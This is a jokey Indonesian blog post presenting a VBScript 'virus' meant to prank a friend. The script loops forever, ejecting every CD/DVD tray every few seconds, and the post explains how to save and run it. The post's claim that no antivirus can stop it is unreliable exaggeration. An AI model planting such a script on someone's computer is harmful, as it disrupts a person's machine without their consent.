Pages

Cara Membuat Virus Komputer

Blogadexme | Cara Membuat Virus Komputer, hal ini memang terbilang aneh tapi gw hanya sekedar berniat untuk mengerjai salah satu teman gw yang akhir-akhir ini sering membuat kesal. Sehingga gw berusaha mencari-cari artikel mengenai Cara Membuat Virus Komputer dengan sebuah kode script. Dulu juga gw pernah membuat sebuah Artikel tentang Menciptakan Virus dengan Visual Basic tapi karena Aplikasi Visual Basic tidak ada di komputer teman gw ini terpaksa berusaha mencari dengan sebuah kode script.

Cara kerja Virus ini cukup lumayan unik kog, Virus ini akan beraksi di Komputer anda dan ketika di jalankan maka secara otomatis DVD/CD Rom yang ada pada Komputer akan terbuka dan tertutup dengan sendirinya. Hal ini cukup membuat reda kekesalan gw terhadap teman gw yang satu ini. Bagaimana untuk sobat sekalian? ada niat untuk mengerjai teman?. Langsung aja praktekkan. Nihh, gw kasih kode script nya.
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Cara penggunaannya lumayan mudah, sobat buka Notpad (Start > All Programs > Assesories > Notpad), lalu Copy-Paste kode Script di atas pada Notpad tadi. Setelah selesai Simpan dengan Ekstensi .vbs. Contohnya ; blogadexme.vbs. Bagaimana ampuh tidak! wkwkwk...

Tapi loe tahu enggak bagaimana cara menghentikan Virus ini?? Hahahaa... Hati-hati saat melakukan hal ini karena Antivirus apapun tidak akan ada yang dapat menghentikan hal ini selain loe menekan Ctrl + Alt + Del pada papan Keyboard setelah itu matikan proses wscripts.exe nya.

Baik, sekian dulu Postingan Blogadexme kali ini mengenai Cara Membuat Virus Komputer semoga bermanfaat dan untuk jaga-jaga ketika sobat loe ada yang mau ngerjai. Dan jangan di salah gunakan karena dapat berakibat Cacad janin serta gangguan kehamilan, wkkwkwkw!